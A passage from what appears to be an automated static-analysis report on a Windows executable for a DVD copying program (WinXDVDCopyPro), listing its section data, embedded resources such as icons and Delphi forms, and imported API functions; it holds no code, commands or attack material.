.reloc	0x93c000	0x8ba24	0x8b600	859ec5e2910662d9a19c2ed297763c67	False	0.6619026765695067	data	7.492414291340643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x618958	0xb79	PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced	Chinese	China	1.00374531835206
PNG	0x6194d4	0xc64	PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced	Chinese	China	1.003467843631778
PNG	0x61a138	0xbb5	PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0036703370036704
PNG	0x61acf0	0xb7a	PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0037440435670524
PNG	0x61b86c	0x18d1	PNG image data, 466 x 45, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9570281756650402
PNG	0x61d140	0x195f	PNG image data, 466 x 45, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9587374903772132
PNG	0x61eaa0	0xb08	PNG image data, 1 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0038951841359773
PNG	0x61f5a8	0x19b2	PNG image data, 466 x 45, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9512009729401034
PNG	0x620f5c	0xe63	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029866956285636
PNG	0x621dc0	0xd01	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0033042955842595
PNG	0x622ac4	0xe78	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029697624190064
PNG	0x62393c	0xc64	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.003467843631778
PNG	0x6245a0	0xef3	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.002874314084139
PNG	0x625494	0xc7a	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034439574201628
PNG	0x626110	0xe9c	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029411764705882
PNG	0x626fac	0xbf4	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.00359477124183
PNG	0x627ba0	0xecb	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029046738843412
PNG	0x628a6c	0xc25	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035381151495657
PNG	0x629694	0xeaf	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029263101888801
PNG	0x62a544	0xc22	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035415325177077
PNG	0x62b168	0xf67	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0027897539944204
PNG	0x62c0d0	0xc8e	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034225264467953
PNG	0x62cd60	0xea0	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029380341880343
PNG	0x62dc00	0xc18	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035529715762275
PNG	0x62e818	0xdd1	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.003109980209217
PNG	0x62f5ec	0xc6b	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034602076124568
PNG	0x630258	0xd3d	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0032457952198288
PNG	0x630f98	0xbe4	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0036136662286466
PNG	0x631b7c	0xec1	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029123643102993
PNG	0x632a40	0xc2c	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035301668806162
PNG	0x63366c	0xef0	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0028765690376569
PNG	0x63455c	0xc5d	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034755134281201
PNG	0x6351bc	0xf14	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0028497409326425
PNG	0x6360d0	0xc57	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034821145932258
PNG	0x636d28	0xe79	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0029689608636978
PNG	0x637ba4	0xc3c	PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035121328224776
PNG	0x6387e0	0x1f92	PNG image data, 466 x 45, 8-bit/color RGBA, non-interlaced	Chinese	China	0.9669636228656273
PNG	0x63a774	0xfdd	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0027086924402857
PNG	0x63b754	0x10f2	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0025357307514984
PNG	0x63c848	0x122f	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0023630504833512
PNG	0x63da78	0x10ec	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.002539242843952
PNG	0x63eb64	0x121f	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0023712006898038
PNG	0x63fd84	0x1083	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.002602318429146
PNG	0x640e08	0x11c6	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0024175824175825
PNG	0x641fd0	0x1188	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0024509803921569
PNG	0x643158	0xf56	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0028018339276616
PNG	0x6440b0	0xf1b	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0028445823635894
PNG	0x644fcc	0x1116	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.002514860539552
PNG	0x6460e4	0x118d	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0024482528377476
PNG	0x647274	0x12c1	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.002291189335555
PNG	0x648538	0x1140	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0024909420289856
PNG	0x649678	0xb28	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0038515406162465
PNG	0x64a1a0	0xbec	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0036041939711664
PNG	0x64ad8c	0xc9d	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034066274388356
PNG	0x64ba2c	0xc2e	PNG image data, 11 x 11, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035279025016035
PNG	0x64c65c	0xc55	PNG image data, 11 x 11, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0034843205574913
PNG	0x64d2b4	0xc38	PNG image data, 11 x 11, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035166240409208
PNG	0x64deec	0xb3d	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0038234271810915
PNG	0x64ea2c	0xc04	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.0035760728218466
PNG	0x64f630	0xca6	PNG image data, 18 x 16, 8-bit/color RGBA, non-interlaced	Chinese	China	1.003397158739963
RT_CURSOR	0x6502d8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x65040c	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x650540	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x650674	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x6507a8	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x6508dc	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x650a10	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x650b44	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x650d14	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x650ef8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x6510c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x651298	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x651468	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x651638	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x651808	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x6519d8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x651ba8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x651d78	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x651e38	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x651f18	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x651ff8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x6520d8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x652198	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x652258	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x652338	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m	English	United States	0.14975247524752475
RT_BITMAP	0x652660	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x652720	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x652800	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0x6528e8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m	English	United States	0.12995049504950495
RT_BITMAP	0x652c10	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x652cd0	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m	English	United States	0.12128712871287128
RT_BITMAP	0x652ff8	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m	English	United States	0.13861386138613863
RT_BITMAP	0x653320	0x328	Device independent bitmap graphic, 16 x 16 x 24, image size 768, resolution 3780 x 3780 px/m	English	United States	0.07054455445544554
RT_BITMAP	0x653648	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_ICON	0x653728	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.39818703418904533
RT_ICON	0x663f50	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.5146433632498819
RT_ICON	0x668178	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.5699170124481328
RT_ICON	0x66a720	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.5940431519699813
RT_ICON	0x66b7c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6950354609929078
RT_DIALOG	0x66bc30	0x52	data			0.7682926829268293
RT_DIALOG	0x66bc84	0x52	data			0.7560975609756098
RT_STRING	0x66bcd8	0x218	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0	Chinese	China	0.2798507462686567
RT_STRING	0x66bef0	0x140	data	Chinese	China	0.346875
RT_STRING	0x66c030	0x4c	data			0.618421052631579
RT_STRING	0x66c07c	0x92	data			0.6438356164383562
RT_STRING	0x66c110	0x186	data			0.5743589743589743
RT_STRING	0x66c298	0x1ce	data			0.5303030303030303
RT_STRING	0x66c468	0x130	data			0.5592105263157895
RT_STRING	0x66c598	0x7e	data			0.6666666666666666
RT_STRING	0x66c618	0x24	data			0.4166666666666667
RT_STRING	0x66c63c	0x158	data			0.5348837209302325
RT_STRING	0x66c794	0x370	data			0.37386363636363634
RT_STRING	0x66cb04	0x4e0	data			0.3685897435897436
RT_STRING	0x66cfe4	0xb44	data			0.2725381414701803
RT_STRING	0x66db28	0x794	data			0.3077319587628866
RT_STRING	0x66e2bc	0x3a4	data			0.36802575107296137
RT_STRING	0x66e660	0x390	data			0.4298245614035088
RT_STRING	0x66e9f0	0x2fc	data			0.4607329842931937
RT_STRING	0x66ecec	0xbc	data			0.6170212765957447
RT_STRING	0x66eda8	0x108	data			0.5643939393939394
RT_STRING	0x66eeb0	0x2d8	data			0.41895604395604397
RT_STRING	0x66f188	0x308	data			0.42396907216494845
RT_STRING	0x66f490	0x428	data			0.3693609022556391
RT_STRING	0x66f8b8	0x38c	data			0.3931718061674009
RT_STRING	0x66fc44	0x268	data			0.3782467532467532
RT_STRING	0x66feac	0xdc	data			0.5636363636363636
RT_STRING	0x66ff88	0x11c	data			0.5774647887323944
RT_STRING	0x6700a4	0x3d0	data			0.3719262295081967
RT_STRING	0x670474	0x434	data			0.3243494423791822
RT_STRING	0x6708a8	0x374	data			0.3766968325791855
RT_STRING	0x670c1c	0x37c	data			0.4226457399103139
RT_STRING	0x670f98	0x404	data			0.32782101167315175
RT_STRING	0x67139c	0x43c	data			0.3874538745387454
RT_STRING	0x6717d8	0x3a8	data			0.3472222222222222
RT_STRING	0x671b80	0x424	data			0.36792452830188677
RT_RCDATA	0x671fa4	0xcbf	PNG image data, 60 x 20, 8-bit/color RGBA, non-interlaced	English	United States	1.0033711308611708
RT_RCDATA	0x672c64	0xd21	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	Russian	Russia	1.0032728354656353
RT_RCDATA	0x673988	0xcdd	PNG image data, 31 x 31, 8-bit/color RGBA, non-interlaced	Russian	Russia	1.0033404190707562
RT_RCDATA	0x674668	0x82e8	data	English	United States	0.11261637622344235
RT_RCDATA	0x67c950	0x10	data			1.5
RT_RCDATA	0x67c960	0x434	PNG image data, 48 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.0102230483271375
RT_RCDATA	0x67cd94	0x4b1	PNG image data, 48 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.0091590341382182
RT_RCDATA	0x67d248	0x1a1	PNG image data, 48 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.026378896882494
RT_RCDATA	0x67d3ec	0x671	PNG image data, 48 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.0066707095209217
RT_RCDATA	0x67da60	0x7b1	PNG image data, 48 x 16, 8-bit/color RGBA, non-interlaced	English	United States	1.005586592178771
RT_RCDATA	0x67e214	0xb5e	Delphi compiled form '\014TAboutDialog\013AboutDialog\007Caption\006\013AboutDialog\014ClientHeight\003\325'			0.31305841924398625
RT_RCDATA	0x67ed74	0x6159	Delphi compiled form 'TAddFrame'			0.0873159183018338
RT_RCDATA	0x684ed0	0x18b	Delphi compiled form 'TBaseFrame'			0.660759493670886
RT_RCDATA	0x68505c	0x76	Delphi compiled form '\020TBurnFolderFrame\017BurnFolderFrame'			0.8813559322033898
RT_RCDATA	0x6850d4	0xcde7	Delphi compiled form '\022TBurnInitErrorForm\021BurnInitErrorForm\007Caption\006\021BurnInitErrorForm\014ClientHeight\003\257'			0.12033541386048453
RT_RCDATA	0x691ebc	0x64	Delphi compiled form ''			0.92
RT_RCDATA	0x691f20	0x2663c	Delphi compiled form '\025TBurnnerProgressFrame\024BurnnerProgressFrame\005Width\003\373\001\006Height\003\004\001'			0.17787642135788964
RT_RCDATA	0x6b855c	0x15f9e	Delphi compiled form '\024TBurnnerSettingFrame\023BurnnerSettingFrame\005Width\003\373\001\006Height\003\004\001'			0.32533828071188925
RT_RCDATA	0x6ce4fc	0x15a3e	Delphi compiled form '\024TChangeDiscHintFrame\023ChangeDiscHintFrame\005Width\003\373\001\006Height\003\004\001'			0.32569552562106546
RT_RCDATA	0x6e3f3c	0x262a	Delphi compiled form '\023TChapterBackupFrame\022ChapterBackupFrame'			0.2374616171954964
RT_RCDATA	0x6e6568	0x62ce	Delphi compiled form '\021TCheckUpgradeForm\020CheckUpgradeForm\007Caption\006\020CheckUpgradeForm\014ClientHeight\003\231'			0.08725389420415909
RT_RCDATA	0x6ec838	0x2bc04	Delphi compiled form '\023TConverterSizeFrame\022ConverterSizeFrame\005Width\003\373\001\006Height\003\004\001'			0.1925459253141671
RT_RCDATA	0x71843c	0x2bb79	Delphi compiled form '\025TConvertProgressFrame\024ConvertProgressFrame\005Width\003\373\001\006Height\003\004\001'			0.1921481026442912
RT_RCDATA	0x743fb8	0x12a5b	Delphi compiled form '\017TCopyToDVDFrame\016CopyToDVDFrame\010OnResize\007\013FrameResize'			0.12356799643881171
RT_RCDATA	0x756a14	0xe865	Delphi compiled form '\021TCopyToMPEG2Frame\020CopyToMPEG2Frame\010OnResize\007\013FrameResize'			0.15304321516817104
RT_RCDATA	0x76527c	0x60d3	Delphi compiled form '\013TDialogForm'			0.22277806914915077
RT_RCDATA	0x76b350	0xffa3	Delphi compiled form '\017TDvdBurnerFrame\016DvdBurnerFrame\006Height\0035\002\016ExplicitHeight\0035\002'			0.10147762174716929
RT_RCDATA	0x77b2f4	0x6d	Delphi compiled form '\020TDVDCreatorFrame\017DVDCreatorFrame'			0.8715596330275229
RT_RCDATA	0x77b364	0x637d	Delphi compiled form '\016TDVDToDVDFrame'			0.14484275000981586
RT_RCDATA	0x7816e4	0xa1	Delphi compiled form '\021TDVDToFolderFrame\020DVDToFolderFrame'			0.7639751552795031
RT_RCDATA	0x781788	0xa7	Delphi compiled form '\016TDVDToISOFrame'			0.8383233532934131
RT_RCDATA	0x781830	0xa825	Delphi compiled form '\022TExtractAudioFrame\021ExtractAudioFrame'			0.16622139621326518
RT_RCDATA	0x78c058	0xa84d	Delphi compiled form '\025TExtractSubtitleFrame\024ExtractSubtitleFrame'			0.16527793895787396
RT_RCDATA	0x7968a8	0xa87f	Delphi compiled form '\022TExtractVideoFrame\021ExtractVideoFrame'			0.14600672307870638
RT_RCDATA	0x7a1128	0x2807	Delphi compiled form '\023TFullDVDBackupFrame\022FullDVDBackupFrame'			0.1314531082267981
RT_RCDATA	0x7a3930	0x73	Delphi compiled form '\022TImageMounterFrame\021ImageMounterFrame'			0.8434782608695652
RT_RCDATA	0x7a39a4	0xa7b2	Delphi compiled form '\024TInstallKB932716Form\023InstallKB932716Form\007Caption\006\023InstallKB932716Form\014ClientHeight\003\273'			0.14942930351735384
RT_RCDATA	0x7ae158	0x35461	Delphi compiled form '\023TLastestVersionForm\022LastestVersionForm\007Caption\006\022LastestVersionForm\014ClientHeight\003\365'			0.09033999514227185
RT_RCDATA	0x7e35bc	0xcf93	Delphi compiled form '\021TLicenseErrorForm\020LicenseErrorForm\007Caption\006\020LicenseErrorForm\014ClientHeight\003\257'			0.12418374451909144
RT_RCDATA	0x7f0550	0xeba60	Delphi compiled form '\011TMainForm\010MainForm\007Caption\006\016WinXDVDCopyPro\014ClientHeight\003\205\002\013ClientWidth\003\331\003\005Color\004\362\362\362'			0.19788731226999967
RT_RCDATA	0x8dbfb0	0x5a2	Delphi compiled form 'TPathDialogForm'			0.48613037447988905
RT_RCDATA	0x8dc554	0x10f	Delphi compiled form 'TPngForm'			0.7859778597785978
RT_RCDATA	0x8dc664	0x31b	Delphi compiled form ''			0.3849056603773585
RT_RCDATA	0x8dc980	0x627b	Delphi compiled form '\021TRegistChangeForm\020RegistChangeForm\007Caption\006\020RegistChangeForm\010Position\007\016poScreenCenter\006OnShow\007\010FormShow'			0.09551386299631114
RT_RCDATA	0x8e2bfc	0x1ebf4	Delphi compiled form ''			0.2483484198824837
RT_RCDATA	0x9017f0	0x1ca8	Delphi compiled form 'TsCalcForm'			0.1736641221374046
RT_RCDATA	0x903498	0x1b89	Delphi compiled form 'TsColorDialogForm'			0.24783657256348418
RT_RCDATA	0x905024	0xb390	Delphi compiled form '\017TSelectDVDFrame\016SelectDVDFrame'			0.12197615732683606
RT_RCDATA	0x9103b4	0x1524b	Delphi compiled form '\025TShowRegisterDlgFrame\024ShowRegisterDlgFrame\007Caption\006\017ShowRegisterDlg\014ClientHeight\003K\001\013ClientWidth\003\240\001\006OnShow\007\010FormShow'			0.33691673498608593
RT_RCDATA	0x925600	0x30a	Delphi compiled form 'TsPopupCalendar'			0.6002570694087404
RT_RCDATA	0x92590c	0x9615	Delphi compiled form '\024TToolIsoMounterFrame\023ToolIsoMounterFrame\016DoubleBuffered\011\024ParentDoubleBuffered\010'			0.15306733296894928
RT_RCDATA	0x92ef24	0xc24a	Delphi compiled form '\023TUpgradeVersionForm\022UpgradeVersionForm\007Caption\006\022UpgradeVersionForm\014ClientHeight\003\305'			0.0532791829184929
RT_RCDATA	0x93b170	0x10d	Delphi compiled form 'TUserMessageForm'			0.7434944237918215
RT_RCDATA	0x93b280	0x60b	Delphi compiled form 'TVariableForm'			0.35488041370394313
RT_GROUP_CURSOR	0x93b88c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x93b8a0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x93b8b4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x93b8c8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x93b8dc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x93b8f0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x93b904	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x93b918	0x4c	data	Chinese	China	0.8026315789473685
RT_VERSION	0x93b964	0x2bc	data	Chinese	China	0.4828571428571429
RT_MANIFEST	0x93bc20	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
ADVAPI32.DLL	AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegLoadKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegReplaceKeyW, RegRestoreKeyW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW
KERNEL32.DLL	CloseHandle, CompareStringW, CopyFileW, CreateDirectoryA, CreateDirectoryW, CreateEventW, CreateFileA, CreateFileW, CreateMutexW, CreatePipe, CreateProcessW, CreateThread, DeleteCriticalSection, DeleteFileA, DeleteFileW, EnterCriticalSection, EnumCalendarInfoW, ExitProcess, ExitThread, FileTimeToDosDateTime, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, FindCloseChangeNotification, FindFirstChangeNotificationW, FindFirstFileA, FindFirstFileW, FindNextChangeNotification, FindNextFileW, FindResourceW, FlushFileBuffers, FormatMessageW, FreeLibrary, FreeResource, GetACP, GetCPInfo, GetCommandLineW, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetCurrentThreadId, GetDateFormatW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentStrings, GetEnvironmentStringsW, GetExitCodeProcess, GetExitCodeThread, GetFileAttributesA, GetFileAttributesW, GetFileSize, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLastError, GetLocalTime, GetLocaleInfoA, GetLocaleInfoW, GetModuleFileNameA, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleW, GetOEMCP, GetPrivateProfileStringW, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetStartupInfoW, GetStdHandle, GetStringTypeA, GetStringTypeW, GetSystemDefaultLangID, GetSystemDefaultUILanguage, GetSystemDirectoryW, GetSystemInfo, GetThreadLocale, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultUILanguage, GetVersion, GetVersionExA, GetVersionExW, GetVolumeInformationW, GlobalAddAtomW, GlobalAlloc, GlobalDeleteAtom, GlobalFindAtomW, GlobalFree, GlobalHandle, GlobalLock, GlobalSize, GlobalUnlock, HeapAlloc, HeapFree, InitializeCriticalSection, InterlockedCompareExchange, InterlockedDecrement, InterlockedExchange, InterlockedExchangeAdd, InterlockedIncrement, IsDBCSLeadByteEx, IsDebuggerPresent, IsValidLocale, LCMapStringA, LCMapStringW, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LoadResource, LocalAlloc, LocalFree, LockResource, MulDiv, MultiByteToWideChar, OpenProcess, OutputDebugStringW, QueryPerformanceCounter, RaiseException, ReadFile, ReleaseMutex, RemoveDirectoryA, ResetEvent, ResumeThread, RtlUnwind, SetConsoleCtrlHandler, SetCurrentDirectoryA, SetCurrentDirectoryW, SetEndOfFile, SetErrorMode, SetEvent, SetFileAttributesW, SetFilePointer, SetHandleCount, SetLastError, SetThreadExecutionState, SetThreadLocale, SetThreadPriority, SignalObjectAndWait, SizeofResource, Sleep, SuspendThread, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, TryEnterCriticalSection, UnhandledExceptionFilter, VirtualAlloc, VirtualFree, VirtualQuery, VirtualQueryEx, WaitForMultipleObjects, WaitForMultipleObjectsEx, WaitForSingleObject, WideCharToMultiByte, WriteFile, WritePrivateProfileStringW, lstrcmpW, lstrcmpiA, lstrcpyW, lstrcpynW, lstrlenA, lstrlenW
VERSION.DLL	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
WINSPOOL.DRV	ClosePrinter, DocumentPropertiesW, EnumPrintersW, OpenPrinterW
COMCTL32.DLL	FlatSB_GetScrollInfo, FlatSB_GetScrollPos, FlatSB_SetScrollInfo, FlatSB_SetScrollPos, FlatSB_SetScrollProp, ImageList_Add, ImageList_BeginDrag, ImageList_Copy, ImageList_Create, ImageList_Destroy, ImageList_DragEnter, ImageList_DragLeave, ImageList_DragMove, ImageList_DragShowNolock, ImageList_Draw, ImageList_DrawEx, ImageList_EndDrag, ImageList_GetBkColor, ImageList_GetDragImage, ImageList_GetIcon, ImageList_GetIconSize, ImageList_GetImageCount, ImageList_GetImageInfo, ImageList_LoadImageW, ImageList_Read, ImageList_Remove, ImageList_Replace, ImageList_ReplaceIcon, ImageList_SetBkColor, ImageList_SetIconSize, ImageList_SetImageCount, ImageList_SetOverlayImage, ImageList_Write, InitializeFlatSB, _TrackMouseEvent
COMDLG32.DLL	ChooseColorW, GetSaveFileNameW, GetOpenFileNameW
GDI32.DLL	AbortDoc, Arc, BitBlt, Chord, CombineRgn, CopyEnhMetaFileW, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDCW, CreateDIBSection, CreateDIBitmap, CreateFontIndirectW, CreateHalftonePalette, CreateICW, CreatePalette, CreatePen, CreatePenIndirect, CreateRectRgn, CreateSolidBrush, DeleteDC, DeleteEnhMetaFile, DeleteObject, Ellipse, EndDoc, EndPage, EnumFontFamiliesExW, EnumFontsW, ExcludeClipRect, ExtCreatePen, ExtFloodFill, ExtTextOutW, FrameRgn, GdiFlush, GetBitmapBits, GetBitmapDimensionEx, GetBrushOrgEx, GetClipBox, GetCurrentPositionEx, GetDCOrgEx, GetDIBColorTable, GetDIBits, GetDeviceCaps, GetEnhMetaFileBits, GetEnhMetaFileDescriptionW, GetEnhMetaFileHeader, GetEnhMetaFilePaletteEntries, GetNearestPaletteIndex, GetObjectW, GetPaletteEntries, GetPixel, GetRgnBox, GetStockObject, GetSystemPaletteEntries, GetTextExtentPoint32W, GetTextExtentPointW, GetTextMetricsW, GetViewportOrgEx, GetWinMetaFileBits, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, MoveToEx, PatBlt, Pie, PlayEnhMetaFile, PolyBezier, PolyBezierTo, PolyPolyline, Polygon, Polyline, RealizePalette, RectVisible, Rectangle, ResizePalette, RestoreDC, RoundRect, SaveDC, SelectClipRgn, SelectObject, SelectPalette, SetAbortProc, SetBkColor, SetBkMode, SetBrushOrgEx, SetDIBColorTable, SetDIBits, 